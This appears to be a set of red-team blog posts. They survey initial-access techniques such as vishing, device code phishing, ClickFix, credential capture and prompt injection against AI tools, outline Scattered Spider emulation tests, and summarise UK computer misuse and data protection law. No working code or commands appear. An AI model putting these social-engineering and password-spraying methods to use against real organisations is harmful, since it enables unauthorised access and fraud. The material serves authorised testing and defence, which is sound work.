Having spent a lot of 2024 and 2025 focusing on initial access, I thought it might be useful to make a summary of recent public developments and techniques which have become popular in recent months. This will focus heavily on initial access payloads and less on general OSINT techniques, though these still have a place!
Before we start, I wanted to call out the Initial Access Guid and BreakDev Red Discord’s, which have been a great source of inspiration and learning! In addition, there are some blogs and videos which I would strongly recommend watching for anyone interested in learning more about initial access and OSINT:
According to CrowdStrike, vishing increased in popularity by 442% in H2 2024, as well as Scattered Spider performing several high profile compromises leveraging vishing in several forms, highlighting how effective and flexible this technique can be. For example, it can suit a range of pretexts and levels of access whilst avoiding a large number of the detections which exist via other methods, such as EDR or mail filtering. Some of the commonly used pretexts include:
Vishing the IT Service Desk to obtain password and/or MFA resets for an account
Vishing a user directly to get them to reveal credentials, execute a payload or consent to a malicious OAuth application
Perform ‘internal’ vishing to privilege escalate or move laterally, if access has already been obtained.
Combining phishing and vishing to increase the legitimacy of phishing emails
Some recent threat intelligence from Google suggests that UNC6040 has been using vishing in a different way. In their example, the attackers called end users whilst posing as members of IT support. On the call they would then ask the users to authorise a third party application against their SalesForce instance, allowing for exfiltration of sensitive data through OAuth permissions. This is an interesting approach, as by not relying on code execution or credential theft, detection is made even more challenging again.
AI is often closely linked to vishing attacks, though at the time of writing there are not many good end-to-end examples of AI-powered vishing publicly available. Current models can do pre-recorded or simplistic calls well, but struggle on more complex calls and especially when video content is required. Though this is likely just a matter of time until the models improve in capability!
Device Codes
Device codes have exploded in popularity recently, notably with Microsoft’s implementation being leveraged by threat actors. For those who dont know, this allows attackers to generate a code which the victim enters into a legitimate site, such as https://microsoft.com/devicelogin. After entering the code and authenticating with their account, we are able to request access tokens as the victim from the service in question.
A number of services beyond Microsoft support this authentication flow, with some covered in separate blog posts:
There are a number of really interesting things you can do here, to leverage device codes in payloads, but again that will have to wait!
FileFix/ClickFix
FileFix and ClickFix are two related techniques which encourage end users into copying a command and pasting it within a location which will execute the code. In the case of FileFix, this is generally within the address bar of a file explorer. For ClickFix this is generally either a terminal-style application, or within the Run dialog.
CloudFlare-styled ‘authentication’ requiring a command to be run
The ReCaptcha example mentioned above
Various approaches where the target must ‘authenticate’ themselves by running a command
Whilst most blog posts focus on Windows, this is still an effective technique against Mac devices which havent been hardened against the various LoLBAS-style commands. Some example commands are covered by the Mac-specific ‘LOOBins’ project. Delivr.to make a specific mention of osascript being leveraged in campaigns.
MacOS
MacOS has unusually had several initial access techniques be revealed in the past few months, with two talks by SpecterOps at SOCon revealing new initial access techniques:
These are particularly interesting, as they allow for more novel means of gaining initial access without relying on the classic usage of curl/wget and piping into bash or similar.
Additionally, a post by eSentire covered a campaign which used a DMG file to coerce users into dragging and dropping a file onto the Terminal, bypassing Gatekeeper. This technique does have several steps (and potential drawbacks), but it allows for a high degree of flexibility in payload delivery. A screenshot from their blog is below.
AI/Prompt Injection
An ‘emerging’ vector leverages prompt injection to poison the models of AI systems. As these systems and tools increasingly monitor more areas of our corporate lives, they are gaining the ability to read and parse a greater range of information. Naturally, if they are parsing attacker-controllable information, this can present some new avenues of attack. This is not news to anyone involved in cyber, but ‘in the wild’ examples beyond simple proof-of-concepts have been slow to emerge.
As with all AI-based attacks, this is unlikely to be resolved any time soon, especially with the growing demand for AI across applications and business use cases.
From https://0din.ai/blog/phishing-for-gemini
Credential Capture
Credential capture payloads continue to be a viable technique, though awareness of this approach does make it more challenging. The re-use of any captured credentials is increasingly requiring attention to detail, to ensure that the re-use is not caught by Conditional Access Policies or similar. Kuba Gretzky has delivered two really useful talks at x33fcon on this subject, focusing on evasion of defensive products, as well as some specific detections during the authentication process, such as CSS canaries.
Final Thoughts
Outside of the techniques mentioned above, a number of ‘older’ techniques are still highly effective, and are worth checking, such as credential reuse or stuffing attacks using stealer logs. Whilst perimeters are becoming increasingly secure, I commonly see exposed information in areas which are less heavily monitored by run of the mill ASM solutions. For example, credentials or internal terms within code sharing sites such as GitHub, StackOverflow, personal blogs and so on. Thinking a little outside the box can often reveal unexpected findings and key information.
In terms of payload delivery, the LOTS Project remains a big player, with a number of services which can be exploited for a number of uses. Common business applications are also a versatile option, though ensure you are compliant with the providers terms and conditions if you are to use them! With the ongoing shift to SaaS and cloud-hosted solutions, companies are using an every expanding list of products and services. Often these services have their own pitfalls or ability to be leveraged by attackers.
Recently Scattered Spider (G1015) have been gathering attention from a range of attacks against UK retail, namely attacks against Marks and Spencer, Harrods and Co-Op. These have led to extensive service disruption, with some firms being able to limit the impacts caused more than others. This is in addition to a range of attacks in previous years against telecommunication and Business Process Outsourcing (BPO) providers. Given the impact felt by the recent attacks against retail firms, understandably other businesses want to assess their defences against such attacks.
Threat Intelligence
To start, let’s summarise the TTPs of Scattered Spider from public threat intelligence sources, along with some ideas on how these can be tested safely. I will focus heavily on the initial stages of a Scattered-Spider attack, as this is the typical focus for most companies, though reviewing the post-exploitation TTPs would also be advisable!
The report also lists Bring-Your-Own Vulnerable Driver (BYOVD) as a TTP, which could be considered for testing, or ensuring that BYOVD-specific controls are enabled, such as the corresponding ASR rule in MDE.
Google/Mandiant
A recent Mandiant report lists a range of TTPs which mirror the above, with a handy diagram (below) which shows a graphical mapping of the TTPs across the attack chain.
Notably there are a lot of other lower-skilled TTPs listed here, such as using Mimikatz and secretsdump.py, which should be readily detected by any EDR.
Following a successful vish or phish of a user, Scattered Spider were observed to then perform more detailed OSINT into the targets, looking to identify potential answers to their security questions or perform targeted SIM swapping attacks.
From the above threat intelligence, it is clear to see several common approaches taken by Scattered Spider, specifically around vishing and the widespread use of social engineering tactics. To assess this, there are several different attacks which can be simulated through either a red or purple team exercise.
Vishing
The main TTP used by Scattered Spider appears to be the use of vishing to gain access to their targets. As part of this, the following could be tested:
Vishing the IT Support helpdesk to gain a password and/or MFA reset
This should include both a ‘standard’ and ‘privileged’ user as targets
Assess controls in place on video calling and internal messaging applications
Can an external Teams user directly message/call employees?
Are external tenants only to communicate internally following approval?
Can the SOC correlate the activity from an IT Helpdesk call to any malicious behaviour (I.e. MFA Methods added or unusual account activity)
Perform vishing attacks directly against high-profile or privileged users
Currently this is not listed by any public TI sources, but would be a logical next step for Scattered Spider TTPs
This would have to be carefully planned with considered guardrails and limitations to prevent causing harm or distress to any users.
Performing internal vishing (E.g. social engineering a user from the position of another internal user) can be challenging during a purple team exercise, due to the lack of technical controls which can be implemented to prevent otherwise legitimate behaviour. Instead, this can be somewhat simulated by attempting some of the ‘Risky Sign In’ behaviour below. For example, by simulating the theft of valid credentials, and attempting to authenticate as a secondary account. This would simulate the stages before an internal vishing attack, as the attacker gains access to the internal environment.
Another approach could be to simulate a supply chain compromise, from the position of a IT provider/supplier being compromised. By configuring a separate (trusted) tenant, and then creating an account within it to simulate a third party user or contractor. This could be a privileged account, or simply a ‘standard’ account, which is within a tenant that has a level of trust into the main tenant. Several tests could then be performed from the trusted into the trusting tenant:
Performing vishing and phishing attacks
Such as sharing a link to a credential capture portal, sending various payloads via email or Teams
Throughout these TTPs, the behaviour of email and web filtering and gateway solutions should be checked for any discrepancies compared to the same behaviour performed from an ‘untrusted’ account.
Credential re-use onto SSO-enabled platforms such as Citrix, AVDs or other internal systems
Enumeration of shared cloud resources or internal data repositories
Credential Capture
Scattered Spider appear to make extensive use of credential capture sites, such as those created by Evilginx. These sites are often hosted using domains which mimic the brand being targeted, which could act as another point of detection. Some potential tests include:
Phishing using a credential capture lure
Sending credential capture payloads from a domain impersonating the target (e.g. auth-TARGET_NAME.com)
Assessing that alerts are raised following credential capture activity
Registering domains which impersonate the target to test brand protection controls and/or typo-squatting detections
This can also blur into testing ‘risky sign-in’ activity, such as performing signins from non-compliant hosts or those in unusual geographies. This can be performed by:
Using VPS’s in unusual geographies to simulate a foreign login
Testing ‘impossible travel’
Authenticating using an abnormal host or browser/user agent (E.g. Kali Linux, Firefox)
Authenticating following an MFA Fatigue attack (See later!)
Performing a secondary authentication whilst the user is legitimately signed in.
Credential Re-Use
Credential stuffing or re-use attacks appear to also be used by Scattered Spider, along with a number of other threat actors. Whilst this is a commonly used technique, there are several password spraying TTPs which are worth assessing:
Evaluate breached credentials and combolists for leaked credentials
Depending on the scope and appetite of the customer, performing more targeted OSINT into high profile or privileged users to identify passwords used on personal accounts could be performed – subject to approval!
Perform targeted password spraying using any leaked credentials, including potential modifications (E.g. London101! -> London102!)
Widespread password spraying using passwords relating to the company or industry
With access to a valid account, a wider range of tests can be simulated as an assumed compromise-style test to assess the post-authentication controls:
Attempt to add phone/SMS based MFA methods to an account
If they are, then perform MFA Fatigue tests against it.
Sign in using a non-compliant device
Attempt to perform typical early kill chain behaviour
Searching SharePoint/internal resources for passwords or internal data
Gathering of Teams and Outlook data
Add new MFA methods to the account
Change the password of the account
Follow the ‘Risky Sign In’ activity above
Evaluation of the current password policy and banned password phrases
Remote Management and Monitoring (RMM)
Attempting to download and install various RMM tools on a corporate device should be sufficient to raise alerts, especially if the executable is not being installed via an approved method (E.g. InTune). CISA has a specific advisory on this, which contains additional information.
Attempt to run various commands through a provided console (If it has one) or through cmd/powershell.
Alerts could be raised at all points of these tests, though this can be challenging due to the executables potentially being allowed by policy, for example of AnyConnect is a corporate solution for screensharing or client communications. It would also be a good exercise to ensure any actions performed via a RMM can be successfully attributed to a RMM session by the SOC/IR teams, rather than a more generic attribution to activity via a CLI.
Additional Considerations
Whilst the TI mentioned above lists a range of TTPs, it is also important to consider some of the emerging initial access tradecraft seen by other threat actors, such as Device Code phishing, ClickFix and Living Off Trusted Sites (LOTS). Whilst I dont believe this has been publicly observed as being used by Scattered Spider yet, given the success of such techniques it would be advised to ensure these are also tested, as the TTPs in use may evolve!
A lot of this post focuses on technical controls and testing, but this activity also has a number of potential table top scenarios which could be produced from it to ensure the correct processes are in place. For example:
How would a third-party compromise be handled in light of the recent breaches?
What would the process be for handling AiTM alerts being raised against a privileged IT account?
What would the response be if a mass password-spraying attack was observed from known Scattered Spider infrastructure?
Specific training or guidance for staff may be sensible given the uptick in active attacks from Scattered Spider recently. Training could focus on:
How to identify potential social engineering approaches, focusing on vishing specifically
How can users report suspicious internal messages or video calls
Raising awareness of current attacker trends, such as ClickFix
Recommendations
The FS-ISAC report and the Mandiant report have a range of recommendations on specific controls to be implemented, and would be a good starting point for any assurance activity.
Strap in for a thrilling ride of legal terms and jargon! Legal stuff is certainly not the reason most red teamers perform assessments, but it is a vital part of the role. I’ve wanted to learn more about the actual legal requirements behind we do certain things such as Rules of Engagement, so hopefully this will save some of the pain for others who are interested.
As with anything legal – this post is not official guidance and always do your own research!
Computer Misuse Act (CMA)
The Computer Misuse Act 1990, or CMA, covers a range of legal areas, and is closely related to the Data Protection Act (DPA), which concerns the usage and protection of data. In this post I will try and summarise what the CMA is, what it covers and the potential impacts.
The CMA doesn’t define what a computer is, due to the potential for this to rapidly change. Therefore it is considered as a device which can ‘store, process or retrieve information’.
A ‘Computer System’ is any “device or a group of interconnected or related devices, one or more of which, pursuant to a program, performs automatic processing of data”. ‘Computer Data’ is any “representation of facts, information or concepts in a form suitable for processing in a computer system, including a program suitable to cause a computer system to perform a function.”
The DPA defines personal data as any information relating to an identified or identifiable living individual.
Jurisdiction
Under section 4 of the CMA, liability for offences under sections 1, 3 or 3ZA requires proof of at least one ‘significant link’ with the ‘home country’ concerned (i.e. England and Wales). Notably this isn’t impacted if:
The accused isn’t in the home country at the time of the offence
The target of the CMA offence (e.g. the compromise host) isn’t in the home country
The technological activity which has facilitated the offending may have passed through a server based in the home country
Therefore, if someone commits a crime under Sections 1, 3 or 3ZA whilst in a foreign country, they may still be liable for prosecution within the UK if they are a UK national or their activity would be illegal in their current country.
As defined in section 5, in relation to an offence under Section 3ZA, any of the following rules would consist a ‘significant link’ with domestic jurisdiction:
That the accused was in the home country concerned at the time when s/he committed the unauthorised act (or caused it to be done);
That the unauthorised act was done in relation to a computer in the home country concerned;
That the unauthorised act caused, or created a significant risk of, serious damage of a material kind (within the meaning of that section) in the home country concerned.
As defined in section 6, even the act of conspiring to commit a crime under the CMA would be treated under the same ‘extended extra-territorial jurisdiction arrangements’. For example, you can be outside the UK whilst conspiring to commit a crime according to the CMA and still be liable for it within the UK.
Thresholds For Prosecution
The offence occurs when an individual causes a computer, which would include his own computer, to perform a function with intent to secure access.
This excludes simply having physical contact with a computer and the scrutiny of data without any interaction with a computer. Therefore the act of reading sensitive or confidential output or forms of eavesdropping are not crimes in themselves within the CMA.
The access to the program or data which the accused intends to secure must be ‘unauthorised’ access. For example:
There must be knowledge that the intended access was unauthorised; and
There must have been an intention to secure access to any program or data held in a computer.
The word ‘any’ indicates that the intent does not relate to the computer which the accused is at that time operating. Section 1(2) explains that the intent of the accused does not need to be directed at any particular program or data, mean that an attacker who accesses a computer without any clear idea of what they will find there would still be liable.
This can mean that a lot of the specific detail is pushed to individual policies when considering any testing or internal issues, such as acceptable use policies. Whilst these have no legal bearing, they would be a key consideration in cyber security testing. Cases such as DPP v Bignell [1998] 1 Cr App R8 highlight this, where police officers were found not guilty after requesting details for an indivudal which they didnt have permission to do so, but they did have legitimate access to the PNC.
Offenses
For cyber security professionals, the offenses highlight why effective approval processes are so important for testing, with all the offenses relying on the offender gaining unauthorised access to a system, and knowing that said access is not approved.
Section 1: Unauthorised access to computer material
The maximum penalty for this offense is 2 years imprisonment, making it the most ‘basic’ offense within the CMA. This relates to unauthorised access to a computer, where the access is unauthorised and the offender would know that at the time of the offense occurring.
Section 2: Unauthorised access with intent to commit or facilitate commission of further offences
The maximum penalty for this offense is 5 years imprisonment. This is somewhat of an extension to Section 1, due to the ‘further offenses’ detail. An example could be obtaining access with a view to transferring money.
This further offence can be conducted at a separate time, it just requires the link between the two offenses. This second offense may not be technically feasible – but if it is attempted then they could be liable for a Section 2 offense.
Section 3: Unauthorised Acts with intent to impair, or with recklessness as to impairing the operation of a computer
The maximum sentence for this offense is 10 years’ imprisonment. This covers acts such as DDoS or deliberate damage. Importantly, deliberate modification of data is not necessarily covered by this, unless it impacts the reliability or availability of the data.
The specific acts covered are covered in Section 3(2), either by directly causing or enabling the following impacts:
‘Impair’ the operation of a computer
Prevent or hinder access to any program or data on the computer
Impair the operation of any program or its data
This doesn’t have to be a permanent impact, it can be a temporary impact (Section 3(5))
Section 41(2) of the Serious Crime Act 2015 inserted section 3ZA, with effect from 3 May 2015.
This covers the causation, or ‘significant’ risk of causing ‘material’ damage. This again can be deliberately or ‘recklessly’ caused.
The maximum sentence is 14 years, unless the offence caused or created a significant risk of serious damage to human welfare or national security, as defined in Section 3 (a) and (b), in which case a person guilty of the offence is liable to imprisonment for life.
This is intended to cover the most serious cases concerning Critical National Infrastructure (CNI), with a large number of damages covered by this section. Damage is referred to as being ‘material’ if it leads to any of the following (Sections 3ZA(2,3)):
Damage to human welfare in any place, specifically:
Loss to human life;
Human illness or injury;
Disruption of a supply of money, food, water, energy or fuel;
Disruption of a system of communication;
Disruption of facilities for transport; or
Disruption of services relating to health.
Damage to the environment of any place;
Damage to the economy of any country; or
Damage to the national security of any country.
Section 3A: Making, supplying or obtaining articles for use in offence under Section 1, 3 or 3ZA
The maximum sentence for this is two years’ imprisonment. The rationale behind the creation of this offence is the market in electronic malware or ‘hacker tools’; which can be used for breaking into, or compromising, computer systems. For this, an ‘article’ is any program or data held in electronic form. This is the section likely most relevant to red teamers, given the large number of people involved in the open-source community. Whilst it is unlikely that Section 3A offences would be charged against someone contributing to open-source projects, it it worth considering!
This covers a wide range of activity relating to committing an offence under Sections 1, 3 or 3ZA:
Someone making, adapting, suppling or offering to supply any ‘article’
This also includes obtaining an ‘article’ in order to supply or use it
This is based on some of the following criteria/guidance:
Has the article been developed primarily, deliberately and for the sole purpose of committing a CMA offence (i.e. unauthorised access to computer material)?
Is the article available on a wide scale commercial basis and sold through legitimate channels?
Is the article widely used for legitimate purposes?
Does it have a substantial installation base?
What was the context in which the article was used to commit the offence compared with its original intended purpose?
Public Interest
The Crown Prosecution Service (CPS) has a great summary of the consideration for public interest in any case being raised:
As always, the public interest in a case features heavily. For example, where there is sufficient evidence to meet the evidential test under the ‘Code for Crown Prosecutors’, the following Public Interest factors should be carefully considered:
The financial, reputational, or commercial damage caused to the victim(s);
The offence was committed with the main purpose of financial gain;
The level of sophistication used, particularly sophistication used to conceal or disguise identity (including masquerading as another identity to divert suspicion);
The victim of the offence was vulnerable and has been put in considerable fear or suffered personal attack, damage or disturbance;
The mental health, maturity and chronological age of the defendant at the time of the offence.
Data Protection Act
The Act came into force on 25 May 2018. The Act updates data protection laws in the UK, supplementing the General Data Protection Regulation (EU) 2016/679 (GDPR), implementing the EU Law Enforcement Directive (LED), and extending data protection laws to areas which are not covered by the GDPR or the LED
The Act does not write the GDPR into UK law. The GDPR has direct effect in EU member states from 25 May 2018, which means the GDPR is already part of UK law. After the UK leaves the EU, the GDPR will be converted into UK law (with some amendments) under the European Union (Withdrawal) Act 2018.
Part 1 – Definitions
Several key terms are used within the DPA:
Term
Meaning
Personal Data
Any information relating to an identified or identifiable living individual. This definition does not include the extra detail in the GDPR which goes on to define an ‘identifiable living individual’
Identifiable Living Individual
A living individual who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data or an online identifier; or one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of the individual.
Processing
In relation to information, means an operation or set of operations which is performed on information, or on sets of information, such as: collection, recording, organisation, structuring or storage; adaptation or alteration; retrieval, consultation or use; disclosure by transmission, dissemination or otherwise making available; alignment or combination; or restriction, erasure or destruction.
Data Subject
The identified or identifiable living individual to whom personal data relates.
Controller and Processor
Part 1 does not provide a single definition of controller and processor. Instead it points to the relevant Chapter or Part of the Act for the specific definition of these terms. As a general rule the definitions of controller and processor mirror those of the GDPR: ‘controller’ means the natural or legal person who alone or jointly with others determines the purpose and means of the processing of personal data; and ‘processor’ means the natural or legal person who processes personal data on behalf of the controller.
Filing System
Any structured set of personal data which is accessible according to specific criteria, whether held by automated means or manually and whether centralised, decentralised or dispersed on a functional or geographical basis
The applied GDPR
The GDPR as applied by Part 2 Chapter 3. In practice this means that the Act extends GDPR standards to: processing outside the scope of EU law or processing outside the scope of the GDPR other than processing covered by Part 3 (LED processing) or Part 4 (IS processing)
LED (Law Enforcement Directive)
Used where data is processed by competent authorities for law enforcement purposes
Part 2 – Data Processing
Part 2 of the DPA sets out how data processing can occur, and is heavily linked to the implementation and support of GDPR. Whilst GDPR was automatically enacted due to EU membership at the time, it provides the provision for member states to tailor the language to suit local laws and government. Some examples of this are DPA Part 2 Section 8 which more precisely implements GDPR Article 6 (1)(e), detailing the specific government and public bodies which can process data.
Special Categories
Schedule 1 details the various conditions which permit processing of special categories of personal and criminal offence data:
Part 1 – Conditions relating to employment, health and research
For an employer to process data under this part, any controllers must have an appropriate policy document in place
For public health bodies to process data, it must be conducted under the responsibility of a health professional or other person who has a duty of confidentiality under enactment or law.
For research purposes, it must have a public interest and be in accordance with Article 89(1) GDPR (as supplemented by s19 of the Act)
Part 2 – Substantial public interest conditions
This includes a wide range of potential topics, but all must follow the same underlying principles of being limited and only what is necessary.
Part 3 – Additional conditions relating to criminal offence data
Part 4 – Appropriate policy document and additional safeguards
Should such data be processed, several further policy documents must be created, which must:
Explain how the controller complies with the data protection principles set out in Article 5 of the GDPR;
Explain the controller’s policies for the retention and erasure of personal data processed under the relevant condition; and
Be retained, reviewed and (if appropriate) updated by the controller and (if requested) made available to the Information Commissioner, until six months after the controller ceases carrying out the processing.
Where appropriate policy documentation is required, the controller’s records of processing activities (under Article 30 of the GDPR) must include:
Details of the relevant condition relied on;
How processing satisfies Article 6 of the GDPR (lawfulness of processing); and
Details of whether the personal data is retained and erased in accordance with the appropriate policy documentation (and if not the reasons why not).
Data Transfer
From the GDPR regulations:
The GDPR imposes a general prohibition on the transfer of personal data outside the EU, unless:
Article 45 – the transfer is based on an adequacy decision;
Article 46 – the transfer is subject to appropriate safeguards;
Article 47 – the transfer is governed by Binding Corporate Rules; or
Article 49 – the transfer is in accordance with specific exceptions. One of the specific exceptions is where the transfer of personal data outside the EU is necessary for important reasons of public interest (Article 49(1)(d)).
The GDPR doesn’t apply to all processing of personal data occurring in the UK. It doesn’t cover processing which is:
Outside the scope of EU law, such as immigration issues relating to third-country nationals on humanitarian grounds;
Outside the scope of the GDPR, such as ‘common foreign and security policy activities’ (Article 2(2)(b) GDPR), or manual unstructured processing of personal data held by an FOI public authority.
The Freedom of Information Act (FOIA) is mentioned a lot in Section 2, there are several key takeaways:
Unstructured data (i.e. Paper records) are not subject to FOI requests, as it would be too onerous, though the general GDPR rules/principals still apply
Data previously reseved for usage by LED can be shared so long as its usage is still relevant to its original purpose, whilst following the key pillars of GDPR. For example, sharing anonymized crime statistics to help reduce crime.
Part 3 regulates the processing of personal data by competent authorities (“competent authorities”) for the purposes of “the prevention, investigation, detection or prosecution of criminal offences or the execution of criminal penalties, including the safeguarding against and the prevention of threats to public security” (together “law enforcement purposes”).
This Part implements the Law Enforcement Directive EU2016/680 (LED) into UK law, with additional provisions. The LED came into force in 2016 and EU member states had until May 2018 to adopt national legislation implementing its provisions
Part 4 – Intelligence Services Processing
National security falls outside the scope of EU law. The activities of the UK intelligence services are therefore outside the scope of the GDPR and the LED. Part 4 of the Data Protection Act introduces a data protection regime applicable to processing of personal data by the intelligence services, such as The Security Service, the Secret Intelligence Service and the Government Communications Headquarters.
Part 5 – The Information Commissioner
The Information Commissioner is the UK’s national supervisory authority for the purposes of the GDPR, the LED and the Act and shall continue to be the UK’s designated authority for the purposes of the Convention 108.
Part 6 – Enforcement
The Information Commissioner has several powers as part of their role:
Information Notice
“To require someone to provide information that the Commissioner reasonably requires for her functions or for certain investigations”
The minimum time must be complied with is within 24 hours notice.
Assessment Notice
“To require a controller or processor to submit to an assessment as to data protection compliance”
The minimum time must be complied with is within 7 days notice.
Enforcement Notice
“To require a person to take the steps specified in the notice, or to require that a person refrains from taking certain steps.”
The minimum time must be complied with is within 24 hours notice.
Penalty Notice
“To require a person to pay to the Commissioner the amount specified in the notice.”
The minimum time must be complied with is within 28 days notice.
Each item has various reasons why a person doesnt have to comply, though most would not be applicable to red team exercises. The most relevant one would be when the notice is withdrawn in writing. Outside of this, the following exceptions apply:
Where personal data is being processed for the special purposes, for Assessment Notices
Where the processing is for the special purposes, unless the Commissioner has issued a s174 determination and the court has granted leave for the notice, for Enforcement Notices
Fines
The maximum fines which can be levied follow the GDPR structure:
“the standard maximum amount”: the higher of 10,000,000 EUR or (in the case of an undertaking) 2% of the undertaking’s total annual worldwide turnover in the preceding financial year.
“the higher maximum amount”: the higher of 20,000,000 EUR or (in the case of an undertaking) 4% of the undertaking’s to
Legal Powers To Inspect
A warrant may be issued if a court judge is satisfied that there are reasonable grounds to suspect that crime under the Act has been or is being committed, or that a person has failed, or is failing, to (in summary):
Comply with the data protection principles, data subject rights and controller/processor obligations set out in the GDPR or the Act;
Communicate a personal data breach to the Information Commissioner or a data subject; or
Comply with the principles for transfers of personal data to third countries, non-Convention countries and international organisation
In addition, a judge must also be satisfied that there are reasonable grounds to suspect that evidence of the failure or offence can be found on the premises, or could be viewed using equipment on the premises. This warrant will only be issued if various conditions are met:
At least seven days have passed since the Information Commissioner gave notice in writing demanding access to the premises in question.
Access was demanded at a reasonable hour, but access was unreasonably refused; or entry was granted by the occupier, but they unreasonably refused to allow the Information Commissioner to carry out the required searches and inspections.
The occupier of the premises was notified by the Information Commissioner that an application for the warrant had been made.
If the personal data is processed for the special purposes, then this activity is covered under Section 174.
Complaints & Avoidance
It is clearly an offence to delete information which may realistically be required to be retained by an Information Commissioner. The only defense to this is if the destruction/disposal would have occurred regardless of the notice being given. This is Part 6, Section 148.
Part 6, Section 170 details the criminal offenses relating to obtaining and retaining personal data without the consent of the controller or retaining data without permission.
Section 173 provides that, where a subject access or data portability request has been received, it is an offence for a controller or related persons, including a processor, to take action to prevent the sharing of information which an individual would be entitled to receive. It is a defence if the action would have occurred regardless of the request or if the person charged acted in the reasonable belief that the individual was not entitled to receive the information.
Fraud Act 2006
The CPS guidance is really useful for this law! In many cases, fraud can be considered (or comprised of) theft – so potentially charges can be levied under other existing laws relating to theft. A lot of the contents of this law relate to deception, so only specific parts could relate to red teaming. The CPS also highlight that criminal convictions for fraud can be raised, but may be more appropriately handled via regulatory or civil proceedings.
For all cases of fraud, the below must be true, with the maximum sentence being 10 years.
The defendant’s conduct must be dishonest;
His/her intention must be to make a gain or cause a loss or the risk of a loss to another.
No gain or loss needs actually to have been made.
This highlights the crux of all potential fraud cases relating to cyber security testing (“his/her intention must be to make a gain; or cause a loss or the risk of a loss to another”). A well defined and scoped test will ensure that no loss/gain is obtained, with testing simply being performed to simulate such activity.
Section 2 – Fraud by false representation
The following must be true for someone to be culpable of a Section 2 offence:
Made a false representation
Dishonestly
Knowing that the representation was or might be untrue or misleading
With intent to make a gain for himself or another, to cause loss to another or to expose another to risk of loss.
Section 6 – Possession of articles for use in fraud
For a section 6 offence, he defendant must have:
Had possession or control of;
An article;
For use in the course of or in connection with any fraud.
The wording draws on Section 25 of the Theft Act 1968. The proof required is that the Defendant had the article for the purpose or with the intention that it be used in the course of or in connection with an offence.
The CPS makes specific guidance on those ‘involved in the development of computer software … to test the security of computer or security systems’. For these cases, the defence must rely on the lack of intention to commit fraud.
Section 7 – Making or supplying articles for use in frauds
A section 7 offence occurs when the defendant:
Makes, adapts, supplies or offers to supply any article;
For use in the course of or in connection with fraud;
Knowing that it is designed or adapted for use in the course of or in connection with fraud (Section 7 (1) (a)) or
Intending it to be used to commit or assist in the commission of fraud (Section 7 (1) (b).
Again, the CPS make specific mention about cyber security testing:
A person who makes an article specifically for use in fraud, for example, a software programme to create a phishing website or send phishing email, may be ambivalent about whether the person to whom it is supplied actually uses it for fraud. He will fall foul of Section 7 (1) (a) but will not have the necessary intention for Section 7 (1) (b).
The manufacturer of articles that are capable of being used in or in connection with fraud but have other innocent uses will not fall foul of this section unless he intends that it should be used in a dishonest way (Section 7 (1) (b)).
Human Rights Act
There are 14 ‘articles’ in the Human Rights Act (With 1 & 13 being fulfilled by human rights being enshrined in UK law). This is the UK’s implementation of the European Convention on Human Rights (ECHR)
For cyber security testing, Article 8 is the main item to consider (“Respect for your private and family life”). The key definition is of a ‘private life’, preventing the media and other individuals from interfering with your life. It also covers the secure, private storage of any PII relating to an individual.
This can have several impacts on red teaming, typically covered in a rules of engagement, for example ensuring that appropriate permissions are in place for:
Gathering of private messages/internal chats
Key logging
Monitoring of web traffic/activity
The underlying concepts tie into GDPR, focusing on data minimisation and proportionality of testing/data storage.
Related Acts
Investigatory Powers Act 2016
Whilst this is unlikely to occur during a red team exercise, the Investigatory Powers Act covers the unlawful interception of a public telecommunication system, a private telecommunication system, or a public postal service.
Misconduct in Public Office
This is covers the common-law offence of misconduct in public office, for example, where a police officer misuses the Police National Computer (PNC). Whilst again this is unlikely to occur during red team operations, it highlights the importance of detailed logging and deconfliction processes if performing identity based attacks, or leveraging legitimate accounts to access systems.